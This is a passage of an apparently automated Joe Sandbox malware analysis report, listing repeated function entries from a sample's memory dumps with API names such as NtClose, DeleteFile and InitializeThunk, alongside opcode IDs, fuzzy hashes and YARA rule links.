                                                                                                                                        • Opcode Fuzzy Hash: 087a93d75a4b84e32af9cf21d5fb0da0d0c3dfed15466f40219d2a17887fc0ff
                                                                                                                                        • Instruction Fuzzy Hash: 3A21F7B5A00609ABDB14DFA8CC41FEFB7B9EF89710F108119F958A7241D770A911CBA6
                                                                                                                                        Function 008C95C0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                        • Opcode ID: 6e1897fa7b062e52745c58606a9da80ecf12c3e005416dadf326ea3f74b90c0c
                                                                                                                                        • Instruction ID: fcaa2081734efc9a9b520b1b617b50cb7975b5162edd836101f657010be18bca
                                                                                                                                        • Opcode Fuzzy Hash: 6e1897fa7b062e52745c58606a9da80ecf12c3e005416dadf326ea3f74b90c0c
                                                                                                                                        • Instruction Fuzzy Hash: C4119E71A016087BD720EB68CC02FAFB7BDEF85700F108119F918A7281D670B9028BA6
                                                                                                                                        Function 008C9660 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 008C9694
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8a0000_find.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction ID: 7a55b7caea9b5f60f8f37147a72c345df9a1d3aadaa21a2b38890f09f792d2e6
                                                                                                                                        • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                                                                        • Instruction Fuzzy Hash: 83E08C362002087BD620EB5DEC41F9B776CEFC6794F408419FA08A7242C6B1F91187F6
                                                                                                                                        Function 030F4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: b332675d3d1955f6966eb73d2b861786e472008fe4d72273a203864c4a431d7e
                                                                                                                                        • Instruction ID: 7e2400f1960a915faf9a43185f942aed7eb7543329d04340306f0b007bd9d6f6
                                                                                                                                        • Opcode Fuzzy Hash: b332675d3d1955f6966eb73d2b861786e472008fe4d72273a203864c4a431d7e
                                                                                                                                        • Instruction Fuzzy Hash: 89900231609C08939140B1584984546400597E4301B55D011E0426598C8B548A565361
                                                                                                                                        Function 030F4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 7a126aeb80353753c665c98d4ae34ce967d7ad9395d3622777eaf5bf2f344b30
                                                                                                                                        • Instruction ID: 6db4075d1784639532e7f53eb9a72dc8ae775bcad000c6d685010d427080aa91
                                                                                                                                        • Opcode Fuzzy Hash: 7a126aeb80353753c665c98d4ae34ce967d7ad9395d3622777eaf5bf2f344b30
                                                                                                                                        • Instruction Fuzzy Hash: 34900271605908C34140B1584904406600597E5301395D115A05565A4C875889559269
                                                                                                                                        Function 030F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 3362ffed8f79ac5f672756310306ebb603360f7766cd3854b885646eb78d2795
                                                                                                                                        • Instruction ID: 69d28247167ea741b05c7788a7cdc00b4359bed2ef1ee1c45f1e4ae91539e02d
                                                                                                                                        • Opcode Fuzzy Hash: 3362ffed8f79ac5f672756310306ebb603360f7766cd3854b885646eb78d2795
                                                                                                                                        • Instruction Fuzzy Hash: AA900271206808834105B1584514616400A87E4201B55D021E10165D4DC76589916125
                                                                                                                                        Function 030F2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 5435dbc76b1834d229198e015be80368e2310fb7550a6d72485be74a731f3ac6
                                                                                                                                        • Instruction ID: f32b8af3f41138c29019a03bdcfdb5b5b6c27a82ac5fbc414a46c5f154da6a60
                                                                                                                                        • Opcode Fuzzy Hash: 5435dbc76b1834d229198e015be80368e2310fb7550a6d72485be74a731f3ac6
                                                                                                                                        • Instruction Fuzzy Hash: 9890023160980C83D150B1584514746000587D4301F55D011A0026698D87958B5576A1
                                                                                                                                        Function 030F2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 99293cd3ad60c871a118f9d81f59129864265a537c9058ce80bb89cad32b577e
                                                                                                                                        • Instruction ID: 3c59573f90d75c2b1e806e19961bfd974c699535c1f944a188f2e44aa93be8cd
                                                                                                                                        • Opcode Fuzzy Hash: 99293cd3ad60c871a118f9d81f59129864265a537c9058ce80bb89cad32b577e
                                                                                                                                        • Instruction Fuzzy Hash: 9B90023120984CC3D140B1584504A46001587D4305F55D011A00666D8D97658E55B661
                                                                                                                                        Function 030F2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 5b2ab277c914a0746faecef7915d4b8602cc8b0154a4c57060499b46cd66977f
                                                                                                                                        • Instruction ID: 149630ac6132aece235c61eafaa75afe83550b4ec0a7b520842f4e3c75262f90
                                                                                                                                        • Opcode Fuzzy Hash: 5b2ab277c914a0746faecef7915d4b8602cc8b0154a4c57060499b46cd66977f
                                                                                                                                        • Instruction Fuzzy Hash: 4590023120580C83D180B158450464A000587D5301F95D015A0027698DCB558B5977A1
                                                                                                                                        Function 030F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 89a5f4db994ca1cec0115f634ab9570acf739433f089fb2e71b288e2a80f9efc
                                                                                                                                        • Instruction ID: 57a66ea8510369f6db8851abfd0e1250135c8258215a9f724b38c2e77c1e8c9e
                                                                                                                                        • Opcode Fuzzy Hash: 89a5f4db994ca1cec0115f634ab9570acf739433f089fb2e71b288e2a80f9efc
                                                                                                                                        • Instruction Fuzzy Hash: 7A900435315C0CC30105F55C07045070047C7DD351355D031F10175D4CD771CD715131
                                                                                                                                        Function 030F2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 4bfe012619980bf960f984a4cf7f99ae06ef69646ea3a431e46d9ff8eb8a6c9d
                                                                                                                                        • Instruction ID: a39fdc2bd7b9378142ef5ab98e11a09d9599d5359d8ed9af3e63aaa4610206da
                                                                                                                                        • Opcode Fuzzy Hash: 4bfe012619980bf960f984a4cf7f99ae06ef69646ea3a431e46d9ff8eb8a6c9d
                                                                                                                                        • Instruction Fuzzy Hash: CE900235225808830145F558070450B044597DA351395D015F14175D4CC76189655321
                                                                                                                                        Function 030F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 7eb1dfee09a148bf0154efff85cbdbaca958e90881ac0fe23b40a4b5d0d88878
                                                                                                                                        • Instruction ID: f7d764c1f583963d6b075d0962e363bba60367b7039a0305e0f6f4312ecd4d43
                                                                                                                                        • Opcode Fuzzy Hash: 7eb1dfee09a148bf0154efff85cbdbaca958e90881ac0fe23b40a4b5d0d88878
                                                                                                                                        • Instruction Fuzzy Hash: 7090027134580CC3D100B1584514B060005C7E5301F55D015E1066598D8759CD526126
                                                                                                                                        Function 030F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: c8ff8882798fc64709758aadcebcbc386113b488e33feaa685aa4d4258cfa1d8
                                                                                                                                        • Instruction ID: ea9f7feb2378a219d3958a1f044e39042995b8ae099d985bae4ec818739a8cb7
                                                                                                                                        • Opcode Fuzzy Hash: c8ff8882798fc64709758aadcebcbc386113b488e33feaa685aa4d4258cfa1d8
                                                                                                                                        • Instruction Fuzzy Hash: BD900231605808C34140B16889449064005ABE5211755D121A099A594D879989655665
                                                                                                                                        Function 030F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 52f1cac4207b021f94e553ca99aef1effe8bb20007bc9b3834a807124e6dc402
                                                                                                                                        • Instruction ID: 71d3579843e5fb7f5bf40c93a964a10dbaa18651d6888ed1f0213ef759b54abc
                                                                                                                                        • Opcode Fuzzy Hash: 52f1cac4207b021f94e553ca99aef1effe8bb20007bc9b3834a807124e6dc402
                                                                                                                                        • Instruction Fuzzy Hash: CF900231215C08C3D200B5684D14B07000587D4303F55D115A0156598CCB5589615521
                                                                                                                                        Function 030F2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 1d76bc04714d51660e62fc7cfba3c3bec5f5dd6770ab9cd8de96447bb52664cb
                                                                                                                                        • Instruction ID: 3afcfa6652d1bdf157efa8416c0b426e8e16987d458c8dfc8dbbaadad0b2ba96
                                                                                                                                        • Opcode Fuzzy Hash: 1d76bc04714d51660e62fc7cfba3c3bec5f5dd6770ab9cd8de96447bb52664cb
                                                                                                                                        • Instruction Fuzzy Hash: 6F90023160580D83D101B1584504616000A87D4241F95D022A1026599ECB658A92A131
                                                                                                                                        Function 030F2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 051b57e4f4cbfb49eaeae3b6ec572f7f215f61fc8e1a0acb1672a1c0903144bc
                                                                                                                                        • Instruction ID: ce29756c9d1f4ec346296fb9032911be6428ce2a640da2d580c93cf96e88fb8e
                                                                                                                                        • Opcode Fuzzy Hash: 051b57e4f4cbfb49eaeae3b6ec572f7f215f61fc8e1a0acb1672a1c0903144bc
                                                                                                                                        • Instruction Fuzzy Hash: 1D900271205C0C83D140B5584904607000587D4302F55D011A2066599E8B698D516135
                                                                                                                                        Function 030F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: ddddbea9c8f74f5e7c9ae75308276656ec2b6ae975374fd7d55fa7dd22a55c5b
                                                                                                                                        • Instruction ID: 1cc828b37f0e141b512265d5dbdf64412628ec55581a5b20195254c01306e253
                                                                                                                                        • Opcode Fuzzy Hash: ddddbea9c8f74f5e7c9ae75308276656ec2b6ae975374fd7d55fa7dd22a55c5b
                                                                                                                                        • Instruction Fuzzy Hash: C690023921780883D180B158550860A000587D5202F95E415A001759CCCB5589695321
                                                                                                                                        Function 030F2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 51a344b4c2c7edf83d1baa52d7be61d67bdc56b0a85eb214347dd137a46978b9
                                                                                                                                        • Instruction ID: c475f9ea7c3441ba7d2475f27441ebebdfa7202fbfc32e5406eed76f405c5a21
                                                                                                                                        • Opcode Fuzzy Hash: 51a344b4c2c7edf83d1baa52d7be61d67bdc56b0a85eb214347dd137a46978b9
                                                                                                                                        • Instruction Fuzzy Hash: 3390023130580883D140B15855186064005D7E5301F55E011E0416598CDB5589565222
                                                                                                                                        Function 030F2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 67e8a92496637967a1e4e6e5cdfc7b97e37bd1457126e6d3e703a1e4e2169609
                                                                                                                                        • Instruction ID: a57b6961681b4ed550ace931a7d8a5ba20bb5ef42abac9958e4a763e33825edc
                                                                                                                                        • Opcode Fuzzy Hash: 67e8a92496637967a1e4e6e5cdfc7b97e37bd1457126e6d3e703a1e4e2169609
                                                                                                                                        • Instruction Fuzzy Hash: 3F900231246849D35545F1584504507400697E4241795D012A1416994C87669956D621
                                                                                                                                        Function 030F2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 2d0508505b7946525272b43981b74945e5755f92a539d90515dd2af2b920443d
                                                                                                                                        • Instruction ID: 05236af8d65ff8116aac9e288d4a1696b37bc323601fc656748cea3e8a56facc
                                                                                                                                        • Opcode Fuzzy Hash: 2d0508505b7946525272b43981b74945e5755f92a539d90515dd2af2b920443d
                                                                                                                                        • Instruction Fuzzy Hash: ED90023120580C93D111B1584604707000987D4241F95D412A042659CD97968A52A121
                                                                                                                                        Function 030F2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 6c1c17a6cd48fdb8eccb1dd4c8781dad524eb3e3212ffa12035983bd915a177a
                                                                                                                                        • Instruction ID: ccbc6b6a2d787b94f651f9e7f4a8b3139e055b6bd89a365c5d43f65f783e5fd9
                                                                                                                                        • Opcode Fuzzy Hash: 6c1c17a6cd48fdb8eccb1dd4c8781dad524eb3e3212ffa12035983bd915a177a
                                                                                                                                        • Instruction Fuzzy Hash: F790023120580CC3D100B1584504B46000587E4301F55D016A0126698D8755C9517521
                                                                                                                                        Function 030F2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
